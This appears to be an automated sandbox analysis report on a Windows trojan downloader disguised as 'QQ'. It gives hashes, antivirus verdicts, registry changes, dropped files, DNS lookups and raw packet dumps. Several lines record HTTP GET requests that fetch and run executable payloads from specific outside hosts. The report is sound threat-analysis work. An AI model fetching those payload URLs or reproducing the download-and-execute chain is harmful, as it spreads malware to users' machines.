Analysis Date2016-01-08 00:22:10
MD5c222d6ff6a5b887a088711a01b379a99
SHA1bb83c79da066ce0e630a31406626217edc2b0814

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 992f7fe17e601e479b9505f8224ed649 sha1: 2229b0d08e0075035895934cc76565f17d27c59d size: 417792
Section.rdata md5: f8a472cd5896e45cd3dfd296dc916165 sha1: 9b826423846158c5459ede1a02d5867001b18b7b size: 69632
Section.data md5: 13c39ec56de7233aafbde8bdc86b50bd sha1: 20a7af4e130ce192bcee9b049ebad6b9fbdbd190 size: 61440
Section.rsrc md5: 538c5b4eff37d774c0665190c52edd64 sha1: aff2bfb445d0420acba5bb36632c35f022071eed size: 122880
Timestamp2014-02-03 20:45:23
VersionLegalCopyright: 作者版权所有 请尊重并使用正版
FileVersion: 1.0.0.0
Comments: 本程序使用易语言编写(http://www.eyuyan.com)
ProductName: QQ
ProductVersion: 1.0.0.0
FileDescription: 易语言程序
PackerMicrosoft Visual C++ v6.0
PEhash4bd95b2e6bd2061079b2b5ea8f9e7b13ba16f441
IMPhashefbc0470f4fe2b0883dc2c2c51732fc1
AVCA (E-Trust Ino)No Virus
AVRisingNo Virus
AVMcafeeRDN/Generic Downloader.x
AVAvira (antivir)TR/Dldr.Agent.675840.4
AVTwisterTrojan.558BEC6AFF68@1300.mg
AVAd-AwareTrojan.Generic.11136129
AVAlwil (avast)Evo-gen [Susp]
AVEset (nod32)No Virus
AVGrisoft (avg)Win32/DH{Z05X?}
AVSymantecNo Virus
AVFortinetW32/Generic.AC.31005
AVBitDefenderTrojan.Generic.11136129
AVK7No Virus
AVMicrosoft Security EssentialsNo Virus
AVMicroWorld (escan)Trojan.Generic.11136129
AVMalwareBytesNo Virus
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVIkarusNo Virus
AVEmsisoftTrojan.Generic.11136129
AVZillya!No Virus
AVKasperskyTrojan.Win32.Generic
AVTrend MicroNo Virus
AVCAT (quickheal)Trojan.Generic.r4
AVVirusBlokAda (vba32)No Virus
AVBullGuardTrojan.Generic.11136129
AVArcabit (arcavir)Trojan.Generic.11136129
AVClamAVNo Virus
AVDr. WebTrojan.DownLoader18.42503
AVF-SecureTrojan.Generic.11136129

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates Filec:\play_2061_4657.exe
Creates Filec:\70720000001.exe
Creates Filec:\kuping_s_50698.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates Filec:\setup_3048-4657.exe
Creates Filec:\93234_al.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Filec:\setup_t10112.exe
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates Filec:\LD_2124_S.exe
Creates Filec:\zhan.exe
Creates Filec:\setup_jmss_3031.exe
Creates Filec:\01.exe
Creates Processc://setup_jmss_3031.exe
Creates Processc://setup_t10112.exe
Creates Processc://93234_al.exe
Creates Processc://zhan.exe
Creates Processc://LD_2124_S.exe
Creates Processc://70720000001.exe
Creates Processc://kuping_s_50698.exe
Creates Processc://01.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNScdn.bbi4.com
Winsock DNSdown.yinyue.fm
Winsock DNSdownload.wk12345.com
Winsock DNSdown.guangsu.cn
Winsock DNSqq2847894.b.xundisk.net
Winsock DNSxz.657080.com
Winsock DNSwww.sj88.com
Winsock DNSdownload.wallba.com

Process
↳ c://LD_2124_S.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\LD_212~1.EXE
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Process
↳ c://setup_t10112.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs4.tmp
Creates FileC:\WINDOWS\TEMP\scs3.tmp
Creates FileC:\SETUP_~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scs4.tmp
Deletes FileC:\WINDOWS\TEMP\scs3.tmp

Process
↳ c://93234_al.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs5.tmp
Creates FileC:\93234_AL.EXE
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\TEMP\scs6.tmp
Deletes FileC:\WINDOWS\TEMP\scs5.tmp
Deletes FileC:\WINDOWS\TEMP\scs6.tmp

Process
↳ c://70720000001.exe

Creates FileC:\707200~1.EXE
Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs7.tmp
Creates FileC:\WINDOWS\TEMP\scs8.tmp
Deletes FileC:\WINDOWS\TEMP\scs8.tmp
Deletes FileC:\WINDOWS\TEMP\scs7.tmp

Process
↳ c://kuping_s_50698.exe

Process
↳ c://zhan.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\ZHAN.EXE
Creates FileC:\WINDOWS\TEMP\scsA.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\TEMP\scs9.tmp
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Deletes FileC:\WINDOWS\TEMP\scsA.tmp
Deletes FileC:\WINDOWS\TEMP\scs9.tmp

Process
↳ c://01.exe

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\TEMP\scsC.tmp
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\01.EXE
Creates FileC:\WINDOWS\TEMP\scsB.tmp
Deletes FileC:\WINDOWS\TEMP\scsC.tmp
Deletes FileC:\WINDOWS\TEMP\scsB.tmp

Process
↳ c://setup_jmss_3031.exe

Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scsD.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\TEMP\scsE.tmp

Network Details:

DNSbgp5.yandui.com
Type: A
183.131.193.69
DNSbgp5.yandui.com
Type: A
183.131.193.67
DNSbgp5.yandui.com
Type: A
183.131.193.68
DNSsj88.www.web.glb0.ldcache.net
Type: A
202.97.174.82
DNSsj88.www.web.glb0.ldcache.net
Type: A
202.97.174.81
DNSm8.8ip.cc
Type: A
45.124.65.232
DNSdownload.wk12345.com
Type: A
103.232.215.133
DNSxz.657080.com
Type: A
DNSwww.sj88.com
Type: A
DNSqq2847894.b.xundisk.net
Type: A
DNSdown.yinyue.fm
Type: A
DNScdn.bbi4.com
Type: A
HTTP GEThttp://xz.657080.com/download.php/LD_2124_S.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://www.sj88.com/hezi/jm/setup_t10112.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://qq2847894.b.xundisk.net/93234_al.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://qq2847894.b.xundisk.net/70720000001.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://qq2847894.b.xundisk.net/888.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://qq2847894.b.xundisk.net/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP GEThttp://download.wk12345.com/jmss/setup_jmss_3031.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 183.131.193.69:80
Flows TCP192.168.1.1:1032 ➝ 202.97.174.82:80
Flows TCP192.168.1.1:1033 ➝ 45.124.65.232:80
Flows TCP192.168.1.1:1034 ➝ 45.124.65.232:80
Flows TCP192.168.1.1:1035 ➝ 45.124.65.232:80
Flows TCP192.168.1.1:1036 ➝ 45.124.65.232:80
Flows TCP192.168.1.1:1037 ➝ 103.232.215.133:80

Raw Pcap
0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642e7068   GET /download.ph
0x00000010 (00016)   702f4c44 5f323132 345f532e 65786520   p/LD_2124_S.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a20696d 6167652f 6769662c 20696d61   : image/gif, ima
0x00000040 (00064)   67652f78 2d786269 746d6170 2c20696d   ge/x-xbitmap, im
0x00000050 (00080)   6167652f 6a706567 2c20696d 6167652f   age/jpeg, image/
0x00000060 (00096)   706a7065 672c2061 70706c69 63617469   pjpeg, applicati
0x00000070 (00112)   6f6e2f78 2d73686f 636b7761 76652d66   on/x-shockwave-f
0x00000080 (00128)   6c617368 2c206170 706c6963 6174696f   lash, applicatio
0x00000090 (00144)   6e2f766e 642e6d73 2d657863 656c2c20   n/vnd.ms-excel, 
0x000000a0 (00160)   6170706c 69636174 696f6e2f 766e642e   application/vnd.
0x000000b0 (00176)   6d732d70 6f776572 706f696e 742c2061   ms-powerpoint, a
0x000000c0 (00192)   70706c69 63617469 6f6e2f6d 73776f72   pplication/mswor
0x000000d0 (00208)   642c202a 2f2a0d0a 52656665 7265723a   d, */*..Referer:
0x000000e0 (00224)   20687474 703a2f2f 787a2e36 35373038    http://xz.65708
0x000000f0 (00240)   302e636f 6d2f646f 776e6c6f 61642e70   0.com/download.p
0x00000100 (00256)   68702f4c 445f3231 32345f53 2e657865   hp/LD_2124_S.exe
0x00000110 (00272)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000120 (00288)   653a207a 682d636e 0d0a5573 65722d41   e: zh-cn..User-A
0x00000130 (00304)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000140 (00320)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000150 (00336)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000160 (00352)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x00000170 (00368)   787a2e36 35373038 302e636f 6d0d0a43   xz.657080.com..C
0x00000180 (00384)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x00000190 (00400)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f68657a 692f6a6d 2f736574   GET /hezi/jm/set
0x00000010 (00016)   75705f74 31303131 322e6578 65204854   up_t10112.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   696d6167 652f6769 662c2069 6d616765   image/gif, image
0x00000040 (00064)   2f782d78 6269746d 61702c20 696d6167   /x-xbitmap, imag
0x00000050 (00080)   652f6a70 65672c20 696d6167 652f706a   e/jpeg, image/pj
0x00000060 (00096)   7065672c 20617070 6c696361 74696f6e   peg, application
0x00000070 (00112)   2f782d73 686f636b 77617665 2d666c61   /x-shockwave-fla
0x00000080 (00128)   73682c20 6170706c 69636174 696f6e2f   sh, application/
0x00000090 (00144)   766e642e 6d732d65 7863656c 2c206170   vnd.ms-excel, ap
0x000000a0 (00160)   706c6963 6174696f 6e2f766e 642e6d73   plication/vnd.ms
0x000000b0 (00176)   2d706f77 6572706f 696e742c 20617070   -powerpoint, app
0x000000c0 (00192)   6c696361 74696f6e 2f6d7377 6f72642c   lication/msword,
0x000000d0 (00208)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x000000e0 (00224)   7474703a 2f2f7777 772e736a 38382e63   ttp://www.sj88.c
0x000000f0 (00240)   6f6d2f68 657a692f 6a6d2f73 65747570   om/hezi/jm/setup
0x00000100 (00256)   5f743130 3131322e 6578650d 0a416363   _t10112.exe..Acc
0x00000110 (00272)   6570742d 4c616e67 75616765 3a207a68   ept-Language: zh
0x00000120 (00288)   2d636e0d 0a557365 722d4167 656e743a   -cn..User-Agent:
0x00000130 (00304)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000140 (00320)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000150 (00336)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000160 (00352)   2e30290d 0a486f73 743a2077 77772e73   .0)..Host: www.s
0x00000170 (00368)   6a38382e 636f6d0d 0a436163 68652d43   j88.com..Cache-C
0x00000180 (00384)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000190 (00400)   0d0a0d0a 68650d0a 0d0a                ....he....

0x00000000 (00000)   47455420 2f393332 33345f61 6c2e6578   GET /93234_al.ex
0x00000010 (00016)   65204854 54502f31 2e310d0a 41636365   e HTTP/1.1..Acce
0x00000020 (00032)   70743a20 696d6167 652f6769 662c2069   pt: image/gif, i
0x00000030 (00048)   6d616765 2f782d78 6269746d 61702c20   mage/x-xbitmap, 
0x00000040 (00064)   696d6167 652f6a70 65672c20 696d6167   image/jpeg, imag
0x00000050 (00080)   652f706a 7065672c 20617070 6c696361   e/pjpeg, applica
0x00000060 (00096)   74696f6e 2f782d73 686f636b 77617665   tion/x-shockwave
0x00000070 (00112)   2d666c61 73682c20 6170706c 69636174   -flash, applicat
0x00000080 (00128)   696f6e2f 766e642e 6d732d65 7863656c   ion/vnd.ms-excel
0x00000090 (00144)   2c206170 706c6963 6174696f 6e2f766e   , application/vn
0x000000a0 (00160)   642e6d73 2d706f77 6572706f 696e742c   d.ms-powerpoint,
0x000000b0 (00176)   20617070 6c696361 74696f6e 2f6d7377    application/msw
0x000000c0 (00192)   6f72642c 202a2f2a 0d0a5265 66657265   ord, */*..Refere
0x000000d0 (00208)   723a2068 7474703a 2f2f7171 32383437   r: http://qq2847
0x000000e0 (00224)   3839342e 622e7875 6e646973 6b2e6e65   894.b.xundisk.ne
0x000000f0 (00240)   742f3933 3233345f 616c2e65 78650d0a   t/93234_al.exe..
0x00000100 (00256)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000110 (00272)   207a682d 636e0d0a 55736572 2d416765    zh-cn..User-Age
0x00000120 (00288)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000130 (00304)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000140 (00320)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000150 (00336)   5420352e 30290d0a 486f7374 3a207171   T 5.0)..Host: qq
0x00000160 (00352)   32383437 3839342e 622e7875 6e646973   2847894.b.xundis
0x00000170 (00368)   6b2e6e65 740d0a43 61636865 2d436f6e   k.net..Cache-Con
0x00000180 (00384)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000190 (00400)   0d0a0d0a 68650d0a 0d0a                ....he....

0x00000000 (00000)   47455420 2f373037 32303030 30303031   GET /70720000001
0x00000010 (00016)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000020 (00032)   63636570 743a2069 6d616765 2f676966   ccept: image/gif
0x00000030 (00048)   2c20696d 6167652f 782d7862 69746d61   , image/x-xbitma
0x00000040 (00064)   702c2069 6d616765 2f6a7065 672c2069   p, image/jpeg, i
0x00000050 (00080)   6d616765 2f706a70 65672c20 6170706c   mage/pjpeg, appl
0x00000060 (00096)   69636174 696f6e2f 782d7368 6f636b77   ication/x-shockw
0x00000070 (00112)   6176652d 666c6173 682c2061 70706c69   ave-flash, appli
0x00000080 (00128)   63617469 6f6e2f76 6e642e6d 732d6578   cation/vnd.ms-ex
0x00000090 (00144)   63656c2c 20617070 6c696361 74696f6e   cel, application
0x000000a0 (00160)   2f766e64 2e6d732d 706f7765 72706f69   /vnd.ms-powerpoi
0x000000b0 (00176)   6e742c20 6170706c 69636174 696f6e2f   nt, application/
0x000000c0 (00192)   6d73776f 72642c20 2a2f2a0d 0a526566   msword, */*..Ref
0x000000d0 (00208)   65726572 3a206874 74703a2f 2f717132   erer: http://qq2
0x000000e0 (00224)   38343738 39342e62 2e78756e 6469736b   847894.b.xundisk
0x000000f0 (00240)   2e6e6574 2f373037 32303030 30303031   .net/70720000001
0x00000100 (00256)   2e657865 0d0a4163 63657074 2d4c616e   .exe..Accept-Lan
0x00000110 (00272)   67756167 653a207a 682d636e 0d0a5573   guage: zh-cn..Us
0x00000120 (00288)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000130 (00304)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000140 (00320)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000150 (00336)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000160 (00352)   73743a20 71713238 34373839 342e622e   st: qq2847894.b.
0x00000170 (00368)   78756e64 69736b2e 6e65740d 0a436163   xundisk.net..Cac
0x00000180 (00384)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f383838 2e657865 20485454   GET /888.exe HTT
0x00000010 (00016)   502f312e 310d0a41 63636570 743a2069   P/1.1..Accept: i
0x00000020 (00032)   6d616765 2f676966 2c20696d 6167652f   mage/gif, image/
0x00000030 (00048)   782d7862 69746d61 702c2069 6d616765   x-xbitmap, image
0x00000040 (00064)   2f6a7065 672c2069 6d616765 2f706a70   /jpeg, image/pjp
0x00000050 (00080)   65672c20 6170706c 69636174 696f6e2f   eg, application/
0x00000060 (00096)   782d7368 6f636b77 6176652d 666c6173   x-shockwave-flas
0x00000070 (00112)   682c2061 70706c69 63617469 6f6e2f76   h, application/v
0x00000080 (00128)   6e642e6d 732d6578 63656c2c 20617070   nd.ms-excel, app
0x00000090 (00144)   6c696361 74696f6e 2f766e64 2e6d732d   lication/vnd.ms-
0x000000a0 (00160)   706f7765 72706f69 6e742c20 6170706c   powerpoint, appl
0x000000b0 (00176)   69636174 696f6e2f 6d73776f 72642c20   ication/msword, 
0x000000c0 (00192)   2a2f2a0d 0a526566 65726572 3a206874   */*..Referer: ht
0x000000d0 (00208)   74703a2f 2f717132 38343738 39342e62   tp://qq2847894.b
0x000000e0 (00224)   2e78756e 6469736b 2e6e6574 2f383838   .xundisk.net/888
0x000000f0 (00240)   2e657865 0d0a4163 63657074 2d4c616e   .exe..Accept-Lan
0x00000100 (00256)   67756167 653a207a 682d636e 0d0a5573   guage: zh-cn..Us
0x00000110 (00272)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000120 (00288)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000130 (00304)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000140 (00320)   646f7773 204e5420 352e3029 0d0a486f   dows NT 5.0)..Ho
0x00000150 (00336)   73743a20 71713238 34373839 342e622e   st: qq2847894.b.
0x00000160 (00352)   78756e64 69736b2e 6e65740d 0a436163   xundisk.net..Cac
0x00000170 (00368)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000180 (00384)   61636865 0d0a0d0a 6f6c3a20 6e6f2d63   ache....ol: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f30312e 65786520 48545450   GET /01.exe HTTP
0x00000010 (00016)   2f312e31 0d0a4163 63657074 3a20696d   /1.1..Accept: im
0x00000020 (00032)   6167652f 6769662c 20696d61 67652f78   age/gif, image/x
0x00000030 (00048)   2d786269 746d6170 2c20696d 6167652f   -xbitmap, image/
0x00000040 (00064)   6a706567 2c20696d 6167652f 706a7065   jpeg, image/pjpe
0x00000050 (00080)   672c2061 70706c69 63617469 6f6e2f78   g, application/x
0x00000060 (00096)   2d73686f 636b7761 76652d66 6c617368   -shockwave-flash
0x00000070 (00112)   2c206170 706c6963 6174696f 6e2f766e   , application/vn
0x00000080 (00128)   642e6d73 2d657863 656c2c20 6170706c   d.ms-excel, appl
0x00000090 (00144)   69636174 696f6e2f 766e642e 6d732d70   ication/vnd.ms-p
0x000000a0 (00160)   6f776572 706f696e 742c2061 70706c69   owerpoint, appli
0x000000b0 (00176)   63617469 6f6e2f6d 73776f72 642c202a   cation/msword, *
0x000000c0 (00192)   2f2a0d0a 52656665 7265723a 20687474   /*..Referer: htt
0x000000d0 (00208)   703a2f2f 71713238 34373839 342e622e   p://qq2847894.b.
0x000000e0 (00224)   78756e64 69736b2e 6e65742f 30312e65   xundisk.net/01.e
0x000000f0 (00240)   78650d0a 41636365 70742d4c 616e6775   xe..Accept-Langu
0x00000100 (00256)   6167653a 207a682d 636e0d0a 55736572   age: zh-cn..User
0x00000110 (00272)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000120 (00288)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000130 (00304)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x00000140 (00320)   7773204e 5420352e 30290d0a 486f7374   ws NT 5.0)..Host
0x00000150 (00336)   3a207171 32383437 3839342e 622e7875   : qq2847894.b.xu
0x00000160 (00352)   6e646973 6b2e6e65 740d0a43 61636865   ndisk.net..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a0d0a 6f6c3a20 6e6f2d63   he......ol: no-c
0x00000190 (00400)   61636865 0d0a0d0a 0d0a                ache......

0x00000000 (00000)   47455420 2f6a6d73 732f7365 7475705f   GET /jmss/setup_
0x00000010 (00016)   6a6d7373 5f333033 312e6578 65204854   jmss_3031.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   696d6167 652f6769 662c2069 6d616765   image/gif, image
0x00000040 (00064)   2f782d78 6269746d 61702c20 696d6167   /x-xbitmap, imag
0x00000050 (00080)   652f6a70 65672c20 696d6167 652f706a   e/jpeg, image/pj
0x00000060 (00096)   7065672c 20617070 6c696361 74696f6e   peg, application
0x00000070 (00112)   2f782d73 686f636b 77617665 2d666c61   /x-shockwave-fla
0x00000080 (00128)   73682c20 6170706c 69636174 696f6e2f   sh, application/
0x00000090 (00144)   766e642e 6d732d65 7863656c 2c206170   vnd.ms-excel, ap
0x000000a0 (00160)   706c6963 6174696f 6e2f766e 642e6d73   plication/vnd.ms
0x000000b0 (00176)   2d706f77 6572706f 696e742c 20617070   -powerpoint, app
0x000000c0 (00192)   6c696361 74696f6e 2f6d7377 6f72642c   lication/msword,
0x000000d0 (00208)   202a2f2a 0d0a5265 66657265 723a2068    */*..Referer: h
0x000000e0 (00224)   7474703a 2f2f646f 776e6c6f 61642e77   ttp://download.w
0x000000f0 (00240)   6b313233 34352e63 6f6d2f6a 6d73732f   k12345.com/jmss/
0x00000100 (00256)   73657475 705f6a6d 73735f33 3033312e   setup_jmss_3031.
0x00000110 (00272)   6578650d 0a416363 6570742d 4c616e67   exe..Accept-Lang
0x00000120 (00288)   75616765 3a207a68 2d636e0d 0a557365   uage: zh-cn..Use
0x00000130 (00304)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000140 (00320)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000150 (00336)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000160 (00352)   6f777320 4e542035 2e30290d 0a486f73   ows NT 5.0)..Hos
0x00000170 (00368)   743a2064 6f776e6c 6f61642e 776b3132   t: download.wk12
0x00000180 (00384)   3334352e 636f6d0d 0a436163 68652d43   345.com..Cache-C
0x00000190 (00400)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000001a0 (00416)   0d0a0d0a                              ....


Strings